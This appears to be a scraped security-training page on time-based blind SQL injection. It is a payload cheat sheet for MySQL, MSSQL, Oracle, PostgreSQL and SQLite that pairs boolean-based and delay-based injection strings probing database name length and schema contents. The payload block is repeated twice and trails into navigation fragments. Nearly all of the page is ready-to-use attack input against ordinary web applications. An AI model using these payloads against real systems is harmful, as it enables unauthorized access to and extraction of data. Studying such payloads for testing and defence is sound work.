Time Based

Last updated 1 year ago

Was this helpful?

Practice

The process is relatively the same as injection. All you have to do is modify the payloads to force the database to wait.

A time-based SQLi payload in MySQL will look like this

1'; SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')-- -

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(database()))=1-- -

#Time Based  
1'; SELECT IF((SELECT LENGTH(database()))=1,SLEEP(10),'a')-- -

A time-based SQLi payload in MSSQL will look like this

1' IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'--

Examples:

#Boolean Based  
1' AND (SELECT LEN(DB_NAME()))=1--

#Time Based  
1' IF ((SELECT LEN(DB_NAME()))=1) WAITFOR DELAY '0:0:10'--

A time-based SQLi payload in OracleSQL will look like this

1' || (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(global_name) FROM global_name)=1--

#Time Based  
1' || (SELECT CASE WHEN ((SELECT LENGTH(global_name) FROM global_name)=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

A time-based SQLi payload in PostgreSQL will look like this

1'; SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(current_database()))=1--

#Time Based  
1'; SELECT CASE WHEN ((SELECT LENGTH(current_database()))=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--

A time-based SQLi payload in SQLite will look like this

1' AND CASE WHEN (YOUR-CONDITION-HERE) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Examples:

#Boolean Based  
1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--

#Time Based  
1' AND CASE WHEN ((SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Practice

The process is relatively the same as injection. All you have to do is modify the payloads to force the database to wait.

A time-based SQLi payload in MySQL will look like this

1'; SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')-- -

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(database()))=1-- -

#Time Based  
1'; SELECT IF((SELECT LENGTH(database()))=1,SLEEP(10),'a')-- -

A time-based SQLi payload in MSSQL will look like this

1' IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'--

Examples:

#Boolean Based  
1' AND (SELECT LEN(DB_NAME()))=1--

#Time Based  
1' IF ((SELECT LEN(DB_NAME()))=1) WAITFOR DELAY '0:0:10'--

A time-based SQLi payload in OracleSQL will look like this

1' || (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(global_name) FROM global_name)=1--

#Time Based  
1' || (SELECT CASE WHEN ((SELECT LENGTH(global_name) FROM global_name)=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

A time-based SQLi payload in PostgreSQL will look like this

1'; SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(current_database()))=1--

#Time Based  
1'; SELECT CASE WHEN ((SELECT LENGTH(current_database()))=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--

A time-based SQLi payload in SQLite will look like this

1' AND CASE WHEN (YOUR-CONDITION-HERE) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Examples:

#Boolean Based  
1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--

#Time Based  
1' AND CASE WHEN ((SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Time Based

Time Based

Theory

Practice

Theory

Practice